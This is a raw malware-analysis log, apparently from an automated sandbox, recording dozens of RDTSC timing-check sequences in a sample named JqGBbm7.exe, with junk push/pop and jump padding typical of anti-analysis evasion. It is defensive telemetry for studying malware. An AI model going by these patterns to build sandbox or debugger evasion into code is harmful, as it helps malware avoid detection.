                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C130B7 second address: C130D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jne 00007FC064DD4F7Ch 0x0000000e jo 00007FC064DD4F76h 0x00000014 push eax 0x00000015 push edx 0x00000016 jc 00007FC064DD4F76h 0x0000001c push esi 0x0000001d pop esi 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C130D5 second address: C130F2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC064DA37B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007FC064DA37BFh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C16D0E second address: C16D20 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FC064DD4F7Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C16D20 second address: C16D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C16D29 second address: C16D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C16D2D second address: C16D33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C16D33 second address: C16D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007FC064DD4F7Ch 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: BD759E second address: BD75A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: BD75A3 second address: BD75BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC064DD4F7Fh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: BD76BE second address: BD76D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: BD76D4 second address: BD76DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: BD78C5 second address: BD78CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: BD7ABA second address: BD7ABE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: BD7ABE second address: BD7ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FC064DA37B6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: BD7BFC second address: BD7C03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: BD7C96 second address: BD7C9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: BD7C9A second address: BD7CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xchg eax, esi 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007FC064DD4F78h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 mov di, dx 0x00000024 nop 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FC064DD4F7Eh 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: BD7CD3 second address: BD7CF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC064DA37C7h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: BD7CF9 second address: BD7D04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FC064DD4F76h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: BD800B second address: BD8037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC064DA37B6h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FC064DA37C6h 0x00000013 push eax 0x00000014 push edx 0x00000015 jg 00007FC064DA37B6h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: BD86A2 second address: BD86B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC064DD4F7Fh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: BD86B9 second address: BD86BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: BD86BF second address: BD86CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C173E8 second address: C17411 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37BBh 0x00000007 jmp 00007FC064DA37C6h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C17411 second address: C17415 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C17550 second address: C17558 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C17558 second address: C1755C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C176B4 second address: C176B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C176B8 second address: C176DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC064DD4F76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jmp 00007FC064DD4F81h 0x00000012 jno 00007FC064DD4F76h 0x00000018 pop edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C17817 second address: C1783A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FC064DA37C2h 0x0000000c jng 00007FC064DA37B8h 0x00000012 push edx 0x00000013 pop edx 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: B89389 second address: B8939E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop esi 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FC064DD4F76h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: B8939E second address: B893A8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC064DA37B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C1F7C6 second address: C1F7DA instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC064DD4F7Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C1F7DA second address: C1F7E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C23BFB second address: C23C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC064DD4F76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C23C05 second address: C23C09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C297CE second address: C297E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jbe 00007FC064DD4F76h 0x00000013 jg 00007FC064DD4F76h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C297E9 second address: C297F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C297F1 second address: C297F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C297F7 second address: C297FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C297FD second address: C29823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC064DD4F87h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007FC064DD4F76h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C2995F second address: C29972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC064DA37BAh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C29972 second address: C29976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C29976 second address: C2997A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C29D77 second address: C29D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jno 00007FC064DD4F76h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C29D87 second address: C29D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C29D8D second address: C29D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: BD81A5 second address: BD8207 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC064DA37BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D30B5h], esi 0x00000013 mov ebx, dword ptr [ebp+124842EBh] 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007FC064DA37B8h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 add eax, ebx 0x00000035 movzx edx, bx 0x00000038 nop 0x00000039 jmp 00007FC064DA37C9h 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push edi 0x00000042 pushad 0x00000043 popad 0x00000044 pop edi 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: BD8207 second address: BD8216 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC064DD4F7Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: BD8216 second address: BD8253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000004h 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FC064DA37B8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a jmp 00007FC064DA37BEh 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C2A04A second address: C2A04E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C2ECFD second address: C2ED01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C2E0E3 second address: C2E0E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C2E4E6 second address: C2E4F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC064DA37BDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C31EC0 second address: C31ECF instructions: 0x00000000 rdtsc 0x00000002 je 00007FC064DD4F7Ah 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C315B0 second address: C315CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37C4h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C31B51 second address: C31B5B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC064DD4F76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C31B5B second address: C31B61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C31B61 second address: C31B65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C31B65 second address: C31B6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C31B6F second address: C31B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C31B73 second address: C31B77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C341FE second address: C3420D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC064DD4F78h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C3A61D second address: C3A623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C3A623 second address: C3A627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C3A8F1 second address: C3A948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnl 00007FC064DA37BAh 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FC064DA37BFh 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007FC064DA37C1h 0x0000001c jmp 00007FC064DA37C3h 0x00000021 popad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FC064DA37BAh 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C3B1A5 second address: C3B1AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C3B1AB second address: C3B1B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C3B1B3 second address: C3B1BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pop edx 0x00000008 push esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C3B1BF second address: C3B1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC064DA37BDh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C3B7AB second address: C3B7C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C3C33D second address: C3C343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C3F7A9 second address: C3F7B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C3FACF second address: C3FAE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC064DA37BDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C3FC55 second address: C3FC6B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FC064DD4F7Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C3FC6B second address: C3FC76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C3FC76 second address: C3FC7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C3FC7A second address: C3FC80 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C3FE06 second address: C3FE20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F86h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C3FE20 second address: C3FE29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C400C8 second address: C400CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C400CE second address: C400D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C400D4 second address: C40101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC064DD4F76h 0x0000000a popad 0x0000000b pop edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007FC064DD4F76h 0x00000015 jmp 00007FC064DD4F88h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C40101 second address: C40105 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C40105 second address: C40148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC064DD4F89h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jg 00007FC064DD4F76h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC064DD4F80h 0x0000001e jg 00007FC064DD4F76h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C4CEDC second address: C4CEE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C4D360 second address: C4D37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC064DD4F76h 0x0000000a jmp 00007FC064DD4F81h 0x0000000f popad 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C4D37F second address: C4D392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC064DA37BEh 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C4D392 second address: C4D3AA instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC064DD4F7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007FC064DD4F76h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C4D3AA second address: C4D3AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C4D4F0 second address: C4D4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
